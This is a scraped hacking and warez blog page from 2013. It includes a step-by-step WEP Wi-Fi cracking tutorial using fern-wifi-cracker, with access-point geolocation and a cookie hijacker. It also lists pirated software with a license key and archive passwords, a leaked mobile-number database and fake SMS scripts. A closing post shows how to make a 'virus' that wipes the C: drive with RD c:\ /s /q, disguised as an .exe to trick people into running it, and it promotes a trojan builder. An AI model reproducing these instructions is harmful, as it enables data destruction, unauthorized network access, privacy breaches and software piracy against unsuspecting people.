Ads 468x60px

1

Infolinks In Text Ads

Infolinks InText

Sample text

Sunday 1 December 2013

Run jar File on PC/Laptop


MicroEmulator screenshot 1 - Various actions can be performed if you follow this panel.

Download Link

Saturday 30 November 2013

Thursday 28 November 2013



1.  RPV (Required Page Views) From 1 to 5
 if in the (RPV / Work) field you see RPV value 1, 2, 3, 4 or 5 click  button a website will open, then visit any sub page with your own interest up to the given RPV value.

For Example :  Watch the "Work No 2" in the screenshot of start today work page below. Its RPV value is 2, first of all you will open this website and when this website is loaded completely visit any 2 web pages of  your own interest.







A very good tutorial by my friend Solitary Man on Wep Cracking. He has used the tool "fern-wifi-cracker" which is easily avaliable on backtrack 5 R3.


So lets begin ...
Go to backtrack -> exploitation tools -> wireless exploitation tools ->
WLAN exploitation --> fern-wifi-cracker... .

interface you have ( it can be wlan0, wlan1 etc....


Now there's a button on which you can see wifi logo, click that and it will start the network scanning  of-course its using airodum p here).

Note*: if you double-click anywhere in the tool, you'll get a "settings" dialog box... you can set the channel there and also you can start the xterm............



Now if you see closely, you'll note that the two buttons below the scan button will get enabled, the first button is the WEP cracking button and the second one is for WPA cracking.

Click the button for WEP cracking...


After clicking that button, a new dialog box will open. you can select the wep network from the list and then you can select the type of attack i.e arp replay attack, chop-chop attack or fragmentation attack. then click "Attack"....


You'll be able to see the number of ivs are increasing.There's a progress bar at the end of the dialog box.When the progress bar reaches the end, this tool starts aircrack for cracking wifi password

When the password is cracked, it will be shown at the bottom of the dialog box...

NOW COMES THE INTERESTING PART: 
(before going further, i suggest you to connect to the internet for this)

Go to "toolbox" --> Geolocatory tracker.....


Give the bssid of the AP in the text box and click "Trace".......


I think everyone has already guessed what it will show...

YES... INDEED... IT WILL SHOW YOU THE LOCATION OF THE AP ON THE GOOGLE MAPS ... You can see the coordinates as well..




And also you can see in the toolbox, there's a button for cookie hijacking called "cookie hijacker" ..

ok guys so that's it for now. :-).....

Sunday 24 November 2013

..Flash Speed 200 Evo . Worldcall Speed ..



Stylish Thems Windows Xp



Portable Skype New 



Q mobile Pc Suite Noir New



Q mobile Pc Suite Smart Phone



On Screen Keybord New



Magic ISO Maker 5.5 With Serial Key



Avast Antivirus New 2014  With License Key 



Your license key is:
---------- Cut here ----------
C64806691H1200A0215-ND5CMWHJ
Rogue Killer 8.2.1 + portable



Fake Sms Script For Blogger 2013



Sim Tracker 2.0 2013




Data Multan Mobile Number Database 2013



pass is:
multan-anax2473421
Ultra Sms Script Leaked



pass is:
tinysms4455

Wednesday 6 November 2013

How to Make a Deadly Virus To Crash Operating System




Warning: Never use it on your own computer. If Program accidentally get activated on your system, You can't repair it again. In this case you have to reinstall your window again.!!!!

Steps to create this program or virus. 
Step 1: Open NOTEPAD and type this command :- 
                      RD c:\ /s /q

Note: C:\ is the location where system files are located. You can change it.

Step 2: Now save as this file and give any name you want with extension .exe and save as file type (all files).

Note: Actually it's a batch file program. But most of the people runs .exe files without thinking anything.. So I am using .exe extension instead of .bat 

Create Virus Using JPS (Virus Maker)


This is a small but very useful software . With the help of this you can create any type of trojans and program it to do whatever you want.
This can be programmed to do the following things:


Blogger templates

Twitter Bird Gadget